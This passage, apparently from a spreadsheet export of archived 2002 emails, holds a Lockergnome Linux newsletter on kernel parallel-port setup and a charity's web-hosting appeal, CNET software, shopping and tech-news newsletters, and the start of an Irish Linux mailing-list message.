so\nstrong that, if I didn't know better, I'd swear that a few of these plugins\nactually run better in Linux than in their native Windows. Honestly, I didn't\nrealize how much I missed them until I started using them in Linux today.\n\nTomorrow holds a few surpirses, with a look at CodeWeavers' CrossOver Office\npackage.\n\nRecommend It!  \nSend us a GnomeTWEAK\n\n  \n\n GnomeCORE  \n  \n---  \n  \n**Kernel Configuration - Part IX**\n\nWe're nine parts into the kernel configuration series, with quite a bit yet to\ngo. If you haven't been following along, we're breaking out the configuration\nscreens one at a time in an attempt to shed some light on the purpose and\nfunction of each. With that knowledge, you should be able to make a clear\ndecision as to how to configure each section.\n\nToday, it's the Parallel Port support section. This is pretty simple. If you\nneed parallel port support - such as for a printer - select this option either\nas a driver built into the kernel or as a loadable module.\n\nMost will use the PC-style hardware option in conjuction with a Windows\nprinter. But that's not all the parallel port can be used for. As an example,\nthe builds I did with the telescope company required parallel port support, as\nthe telescope cameras were attached to this port.\n\nBe aware - this kernel configuration option only makes a driver available for\nthe parallel port. The computer's BIOS sets the mode for the port - ECP, EPP,\nor Auto. On the majority of modern computers, the Auto mode is the default and\nwill work just fine. However, if you have problems communicating with your\nprinter following a kernel recompile, try changing the mode of your printer in\nthe BIOS.\n\nTomorrow, it's Plug and Play configuration.\n\nRecommend It!  \nSend us a GnomeCORE tip\n\n  \n\n GnomeFILE  \n  \n---  \n  \n**Netics 2.0**\n\n  \n[URL]http://www.citi.umich.edu[/URL]\n\n"Netics is an extensible network statistics collector. It puts the network\ninterface in promiscuous mode and reads the data stream (after it strips off\nthe appropriate protocol headers), then displays the results at specified\nintervals, either in a "progress bar" mode or as raw statistics. Currently, it\nsupports 2 statistics, both involving entropy: LZW compressability and Ueli\nMaurer's universal statistical test. Maurer's test is a very good and\ncomprehensive measure of entropy, but requires a large amount of data. The LZW\nstatistic requires much less data."\n\nRecommend It!  \nSend us a GnomeFILE suggestion\n\n  \n\n GnomeVOICE  \n  \n---  \n  \n**Helping Hand**  \nScribbled by Karl Steenblik\n\n"Dear Linux community at Lockergnome.\n\n"I am the web master for largest health care camp in the State of Utah. No not\nCancer camp it is the Diabetic camp.\n\n"The Foundation for Children and Youth with Diabetes serves about 900 diabetic\nchildren a year and their families. We have education, family support, diet\nplanning and most important is camp. The place where kids can learn about how\nto better manage their disease.\n\n"We are a totally non profit camp that puts all money from fees into our camp.\nWe pay no salaries to Physicians, Dietitians, Social Workers, Nurses and\neducators that make our camp possible. Yes even me the lowly web master\ndonates his time and web space at ATT to the cause.\n\n"ATT recently decided to pull access to our photo page due to a password\nprotection. We give out a password to all parents so that they can see photos\nof camp while the sessions are happening. We do not however what the creeps of\nthe web to have access to photos of our kids.\n\n"We are looking for someone in the state to help our camp by donating web\nspace. Now it may not be your organization, but I know Linux people and\nLockergnome and I think someone there may know someone who would be able to\nhelp us.\n\n"You can still have access to the public part of our site that ATT has not\nshut down at [URL]www.fcyd-inc.org[/URL]\n\n"Please I have the parents of 120 diabetic kids wanting to see photos of their\nchildren. They are all e-mailing me and I have no one to turn to.\n\n"Hoping to hear from someone soon."\n\nKarl R Steenblik  \nWebmaster FCYD camp  \nSalt Lake City.\n\nHelp Karl.\n\nRecommend It!  \nSpeak your GnomeVOICE\n\n  \n\n GnomeCLICK  \n  \n---  \n  \n**Mobilix.org**\n\n[URL]http://mobilix.org[/URL]\n\nMobilix.org is a full site related to using Linux on mobile devices, including\nPDAs and laptops. It includes information for subsctibing to the linux-laptop\nmailing list, information on Linux-powered wearable computers, WAP enabled\naccess, and Linux on cell phones. Mobilix looks to be a great resource for all\nkinds of tips, tricks and useful information for taking your Linux on the\nroad.\n\nRecommend It!  \nSuggest a GnomeCLICK\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. Use of the Gnome moniker by Penguin Shell does not imply\nendorsement of the Gnome Desktop Environment. Penguin Shell is an equal-\nopportunity desktop employer. For further information, please refer to the\nGnomeCREDITS in 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See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!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 Win a Digital Camera  \n\n General Feedback  \n Chris's Blog  \n E-mail the Editor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www.qksrv.net http://www.citi.umich.edu www.fcyd-inc.org http://mobilix.org http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET Download.com for Mac" &lt;Online#3.19586.b5-9w0blztbvHPdZdRR.1@newsletter.online.com&gt;\nDate: Tue, 9 Jul 2002 18:53:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 9 Jul 2002 18:53:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET Download.com for Mac" &lt;Online#3.19586.b5-9w0blztbvHPdZdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>This week: Deck, Tex-Edit Plus, Boom</t>
  </si>
  <si>
    <t>CNET | DOWNLOAD DISPATCH(Mac Edition) July 9, 2002 Vol. 7, No. 27 Using a Mac and today's music software, musicians are finding that they can create, record, and master their songs without the need to pay for expensive studio time. Deck, our Pick of the Week, offers a multitrack audio workstation that can take  care of all your recording needs, and it's even optimized for  OS X. Not just great for music, Deck can be used for film, video, and numerous other applications. Get on Deck: [URL]http://clickthru.online.com[/URL]  Also this week, we've got Captain FTP, for an easy way to transfer files; AquilaCalendar, to get you organized under OS X; Tex-Edit Plus, a full-featured alternative to the pricier text editors; and Boom, a remake of one of the great classic arcade games. Enjoy! Jason Parker Assistant Editor, CNET Download.com -- (Unsubscribe instructions are at the bottom of this newsletter.) &lt;---------------Advertisement---------------&gt; Gateway Thin &amp; Light PCs - starting at $1,499! Thin and Light, the Gateway(R) 450 blends price, performance, and portability.  Systems include Mobile Intel(R) Pentium(R) 4-M processors, 14.1" and 15" XGA TFT Active Matrix display  options, and your choice of operating systems. [URL]http://clickthru.online.com[/URL]  &lt;-------------------------------------------&gt; IN THIS ISSUE: 1. This Week's Top 10 Downloads 2. Pick of the Week: Deck 3. The Week in Wares:              - Internet: Captain FTP              - Home and Education: AquilaCalendar              - Development Tools: Tex-Edit Plus              - Games: Boom 4. Updates &amp; Drivers 5. The Week in Reviews: Mac OS X 10.1 prices 6. Overheard on Download.com 7. Download.com Outage Notice P.S. Got a suggestion for CNET Download.com? Send it to: suggestions@download.com _____________________________________________________________ 1. This Week's Top 10 Downloads    1. LimeWire 2.4.4                         5,715 downloads    2. MacSatellite  1.6.1                    4,402 downloads    3. LimeWire (OS X) 2.4.4                  4,043 downloads    4. Hotline Connect Client 1.8.5           3,690 downloads    5. RealPlayer 8.0                         2,730 downloads    6. Sound Studio 2.0.3                     2,690 downloads    7. Internet Explorer 5.1.4                1,949 downloads    8. Fetch 4.0.1                            1,914 downloads    9. OmniWeb (OS X) 4.1                     1,732 downloads   10. DivX for OS X 1.1.8                    1,602 downloads For more details on Download.com's most popular files, click here: [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 2. Pick of the Week    DECK    Version: 3.5    File size: 6.6MB    License: Free to try; $399.00 to buy    Minimum Requirements: Mac OS 9.x or Mac OS X    Looking for a professional, multitrack audio workstation    under OS X? This entry from BIAS, while maybe not the most    attractive Mac app on the block, gives you some hefty    editing functionality--whether you're working in broadcast,    film, video, or any other multimedia environment. The big    brother to BIAS' cheaper Deck LE, Deck 3.5 lets you process    soundtracks, edit dialogue, spot effects, and record    ADR-style voice-overs. Deck also supports surround mixing and    up to four real-time effects plug-ins per track for music    production. A good value, and one of the first of its kind    to hit OS X, this midrange app deserves a listen. You're on    Deck:    [URL]http://clickthru.online.com[/URL]     Want to review Deck? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of our Picks here:    [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 3. The Week in Wares    IN INTERNET:    CAPTAIN FTP    Version: 1.3    File size: 793K    License: Free    Minimum requirements: Mac OS X    Designed completely from scratch to work with OS X, Captain    FTP is a new client that makes finding, uploading, and    downloading files online easier than ever. Since it makes    full use of OS X's multithreaded multitasking capabilities,    you can set up as many simultaneous connections as you like    without slowing down other work on your Mac too much. The    program supports drag-and-drop operation and resuming    interrupted downloads. It also sports a built-in address    book, and integrated BBEdit links. The interface deserves    awards for clarity and good looks. Grab files in style:    [URL]http://clickthru.online.com[/URL]     Want to review Captain FTP? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest Internet software here:    [URL]http://clickthru.online.com[/URL]     IN HOME AND EDUCATION:    AQUILACALENDAR    Version: 1.19    File size: 1.63MB    License: Free to try; $20.00 to buy    Minimum Requirements: Mac OS X    One of the most frustrating things about off-the-shelf    organizer applications is that they try to force everyone to    keep track of things in the same way. AquilaCalendar is    refreshingly different: you can design your own calendar    windows, choosing from a plethora of basic options (day,    week, month, year, several months together, and so on), customize    your calendar with colors and fonts, and more. To-do lists    and notes-to-self can be added to calendars or you can add a    handy clock and holiday markers, among other options. The    interface fits with the OS X design theme, and makes getting    organized no more difficult than it has to be. Get organized:    [URL]http://clickthru.online.com[/URL]     Want to review AquilaCalendar? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest home and education software here:    [URL]http://clickthru.online.com[/URL]     IN DEVELOPMENT TOOLS:    TEX-EDIT PLUS    Version: 4.1.3    File size: 1.17MB    License: Free to try; $15.00 to buy    Minimum Requirements: System 7.x    Before you spend the big bucks on a HTML editor, make sure    you check out Tex-Edit Plus. This handy little editor offers    all the basics like unlimited Undo and Redo commands,    translucent drag-and-drop capabilities, several text styles,    and the option to highlight selected text. Also, you'll be    able to use it to act as a text editor for an FTP client    such as Fetch, Interarchy, NetFinder, or Transmit. Text    editing made easy:    [URL]http://clickthru.online.com[/URL]     Want to review Tex-Edit Plus? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest utilities here:    [URL]http://clickthru.online.com[/URL]     IN GAMES:    BOOM    Version: 1.3    File size: 2.3MB    License: Free to try, $15 to buy    Minimum Requirements: Mac OS 8.x/OS 9.x/OS X    Remember the classic arcade game Bomberman? Even if you    don't, you should take this remake of the old classic for a    spin. Maneuver your way through a maze of corridors while    setting off bombs to clear a path for your escape. You'll    also need to pick up coins for extra points and stay clear    of those nasty aliens to stay alive. Blast your way through    eight alien-infested areas, each one divided into 10    subzones, and kick the Big Alien Boss back to where he came    from. Blast away:    [URL]http://clickthru.online.com[/URL]     Want to review Boom? Submit your opinion here:    [URL]http://clickthru.online.com[/URL]     Find all of the latest games here:    [URL]http://clickthru.online.com[/URL]  ______________________________________________________________ 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features    IN INTERNET:    - DupliMizer 2.4       [URL]http://clickthru.online.com[/URL]     - Web Site Maestro 1.2      [URL]http://clickthru.online.com[/URL]     - Surfer 2.0      [URL]http://clickthru.online.com[/URL]     IN MULTIMEDIA &amp; DESIGN:    - Photo Album Builder 1.2      [URL]http://clickthru.online.com[/URL]     - Cartoon Editor 1.2.1      [URL]http://clickthru.online.com[/URL]     IN UTILITIES:    - Battery Endurance Measurer 1.3      [URL]http://clickthru.online.com[/URL]     - Pixel Tester 2.0      [URL]http://clickthru.online.com[/URL]     - SerialStorage 1.0      [URL]http://clickthru.online.com[/URL]     IN BUSINESS AND FINANCE:    - Gym Organizer 6.5      [URL]http://clickthru.online.com[/URL]     - ChartConstructor 1.0.1      [URL]http://clickthru.online.com[/URL]     IN HOME AND EDUCATION:    - WeatherMan 1.6      [URL]http://clickthru.online.com[/URL]     - Computer Cuisine Deluxe 3.1      [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ 5. The Week in Reviews:    Mac OS X 10.1 prices    If you haven't made the switch to Apple's beautiful and    powerful operating system, check out these prices, which may    change your mind.    [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ 6. Overheard on Download.com    Here are some user comments about an alternative MP3 player    for the Mac:    "Small, Low CPU Usage, Easy"    "Excellent Alternative"    "Neat, discreet, powerful"    "It blows my mind!"    "One of the best to date!"    So what's the name of this mystery download? Click here to    find out:    [URL]http://clickthru.online.com[/URL]  _______________________________________________________________ The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com To sign up for more CNET newsletters, click here: [URL]http://nl.com.com[/URL] To unsubscribe, click here: [URL]http://clickthru.online.com[/URL] To receive your newsletter in HTML format, click here: [URL]http://nl.com.com[/URL] For the CNET Newsletters FAQ, click here: [URL]http://clickthru.online.com[/URL]  To learn about advertising opportunities in CNET Newsletters, click here: [URL]http://clickthru.online.com[/URL]  Copyright 2002 CNET Networks, Inc. All rights reserved.</t>
  </si>
  <si>
    <t>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nl.com.com http://clickthru.online.com http://nl.com.com http://clickthru.online.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Shopper Newsletter Alerts &lt;Online#3.19584.83-p1SYlJ1blFvQjRRR.1@newsletter.online.com&gt;\nDate: Tue, 9 Jul 2002 16:06:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 9 Jul 2002 16:06:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Newsletter Alerts &lt;Online#3.19584.83-p1SYlJ1blFvQjRRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Save an extra $50 on the iPaq 3835 PDA (CNET SHOPPER)</t>
  </si>
  <si>
    <t>![CNET Shopper Newsletter\nAlerts]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://www.cnet.com[/URL]  \n  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft  **  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |  |  |  |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \nJuly 9, 2002 | ![]([URL]http://www.cnet.com[/URL] | **From Computers4Sure**  \nSave an extra $50 on the iPaq 3835 PDA.  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | **From Dell**  \nEnter to win your chance to win $50,000 from Dell!  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n**Computers4Sure** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **iPaq 3835 Pocket PC**  \nÂ• $50 rebate  \nÂ• 64 MB, brilliant TFT screen  \nÂ• 206 MHz Intel processor  \n   **Just $549 after rebate**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Cyber-shot Digital Camera DSC-P51**  \nÂ• Free shipping  \nÂ• 2-megapixels, 1280x960 res.  \nÂ• 2x optical zoom/3x digital zoom  \n   **Just $300**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Maxtor DiamondMax D540X 160GB**  \nÂ• Outstanding capacity &amp; value  \nÂ• 2MB buffer, Avg. Seek 12ms  \nÂ• 5400 RPM, Ultra ATA/133  \n   **Just $260**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n**Dell** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n$50K-a-day Giveaway from Dell Home Systems. . . Buy any new Dell Home System\non or before July 31, 2002 and you'll be automatically entered to win $50,000.\nThe next lucky winner could be you!  \n**More rules and info**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Dell Dimension 4000 series**  \nÂ• 1.7 GHz to 2.53 GHz P4  \nÂ• 128 MB to 1 GB RAM  \nÂ• Up to 120 GB hard drive  \n   **Starting at $689**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Dell Dimension 8000 series**  \nÂ• 1.8 GHz to 2.53 GHz P4  \nÂ• 128 MB to 2 GB RAM  \nÂ• Up to 120 GB hard drive  \n   **Starting at $919**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n  \n  \n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  ![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com\n\nUnsubscribe |  Manage My Subscriptions  | FAQ |  Advertise  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved.**\n\n|\n\n![](http://gserv-\ncnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-09)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.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shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.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www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: "CNET News.com Daily Dispatch" &lt;Online#3.19578.34-UgGTgZFN19NAr9RR.1@newsletter.online.com&gt;\nDate: Tue, 9 Jul 2002 15:54:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 9 Jul 2002 15:54:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Daily Dispatch" &lt;Online#3.19578.34-UgGTgZFN19NAr9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.COM: Cable companies cracking down on Wi-Fi</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|  |  ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n  \n![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 9, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] Cable companies cracking down on\nWi-Fi  \n![]([URL]http://home.cnet.com[/URL] Apple's iPod comes to Linux  \n![]([URL]http://home.cnet.com[/URL] Talk of Dell printer move heats up  \n![]([URL]http://home.cnet.com[/URL] Microsoft eyes Visa users with\nPassport  \n![]([URL]http://home.cnet.com[/URL] Judge OKs suit against Kazaa\nparent  \n![]([URL]http://home.cnet.com[/URL] China wakes to new destiny  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Vision Series**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \nRead News.com's exclusive interviews of 10 top CIOs, including IBM's Phil\nThompson.  \n**Vision Series home**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Cable companies cracking down on Wi-Fi**  \nBroadband providers are cracking down on popular Wi-Fi networks, threatening\nto cut service to customers who set up the inexpensive wireless systems and\nallow others to freely tap into their Internet access. Time Warner Cable of\nNew York City has given 10 customers less than a week to stop using their\naccounts to provide a wireless local area network available to anyone within\n300 feet. The letters are just an initial volley; Time Warner expects to send\nadditional letters, while AT&amp;T; Broadband also is preparing similar letters\nfor some of its customers.  \nJuly 9, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Apple's iPod comes to Linux**  \nWindows users have recently been given access to the popular Macintosh music\nplayer, iPod, and now Linux users may soon be able to take a bite out of Apple\nComputer's gadget. Last week, tex9, a small software-development company in\nSan Francisco, began beta testing an iPod plug-in for its xtunes music player\nsoftware, which is itself a Linux clone of Apple's iTunes. The plug-in will,\ntex9 promises, allow drag-and-drop access to iPod, which holds up to 10GB of\nmusic.  \nJuly 9, 2002, 12:00 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Talk of Dell printer move heats up**  \nDell Computer appears to be moving toward selling its own printers. A pair of\nanalyst reports issued Tuesday added to a torrent of recent speculation that\nthe Round Rock, Texas-based PC maker's next move will be into the printer\nmarket. Dell has plunged into a number of new markets over the past few years.  \nJuly 9, 2002, 12:30 PM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**Microsoft eyes Visa users with Passport**  \nMicrosoft hopes to extend its Passport online identification system into\nauthorizing credit card payments. The software giant will strike a partnership\nTuesday with security-software maker Arcot Systems, which builds online\npayment systems for merchants and for banks that issue Visa and MasterCard\ncredit cards. Arcot makes the systems behind Visa's own Verified by Visa\nprogram as well as a similar program in development at MasterCard.  \nJuly 8, 2002, 9:00 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Judge OKs suit against Kazaa parent**  \nA federal judge said Monday that record labels and film studios could expand\nan ongoing copyright lawsuit to include Sharman Networks, which distributes\nthe popular Kazaa software. The Recording Industry Association of America\n(RIAA) and the Motion Picture Association of America (MPAA) sued three\nprominent file-swapping companies in October in Los Angeles federal court. The\nsuit named Morpheus parent StreamCast Networks, Grokster and Kazaa BV, the\nNetherlands-based company that originally created the Kazaa software.  \nJuly 9, 2002, 12:55 PM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**China wakes to new destiny**  \nGlobal slump prompts tech titans to tap the sleeping giant's manufacturing\nprowess and consumer market.  \nJuly 9, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**Another big charge for AOL?**  \nBusiness Week  \nIt may again have billions of excess goodwill on its books, and a write-down\nwon't go over well with already unhappy investors.  \nJuly 9, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Business needs to take the blinders off**  \nBusiness Week  \nToday's corporate apologists are too much like the Marxists who reflexively\ndefended Communism's old poster boy -- Stalin.  \nJuly 9, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **Netscape 7: How does it stack up?**  \nCNET Download.com's Rex Baldazo previews Netscape 7, a new open-source version\nof the browser that the company hopes will chip away at Microsoft's leading\nposition with Internet Explorer.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * Shares in chip gear fall on new fears\n  * Dell douses Lexmark speculation\n  * Microsoft tests dressed up Web software \n|\n\n**E-Business**  \n\n  * Stocks edge lower after Bush speech\n  * Bush talks tough on corporate fraud\n  * Vignette's forecast dips on demand woes \n  \n---|---  \n  \n**Communications**  \n\n  * WorldCom: The clock is ticking\n  * Deutsche Telekom up on CEO talks\n  * NTT DoCoMo tries new 3G twist \n|\n\n**Media**  \n\n  * Vivendi units harmonize in digital deal\n  * AOL Time Warner secures new credit\n  * Banks bail out Vivendi with loans \n  \n  \n**Personal Technology**  \n\n  * It ain't heavy; it's my laptop\n  * Matsushita: Chip unit headed toward black\n  * French game maker up on Sega rumors \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-09)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>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a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://a.r.tv.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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news.cnet.com http://home.cnet.com http://news.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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ilug@linux.ie\nFrom: =?iso-8859-1?q?Paul=20Linehan?= &lt;plinehan@yahoo.com&gt;\nDate: Tue, 8 Oct 2002 23:51:52 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 8 Oct 2002 23:51:52 +0200 (CEST)</t>
  </si>
  <si>
    <t>=?iso-8859-1?q?Paul=20Linehan?= &lt;plinehan@yahoo.com&gt;</t>
  </si>
  <si>
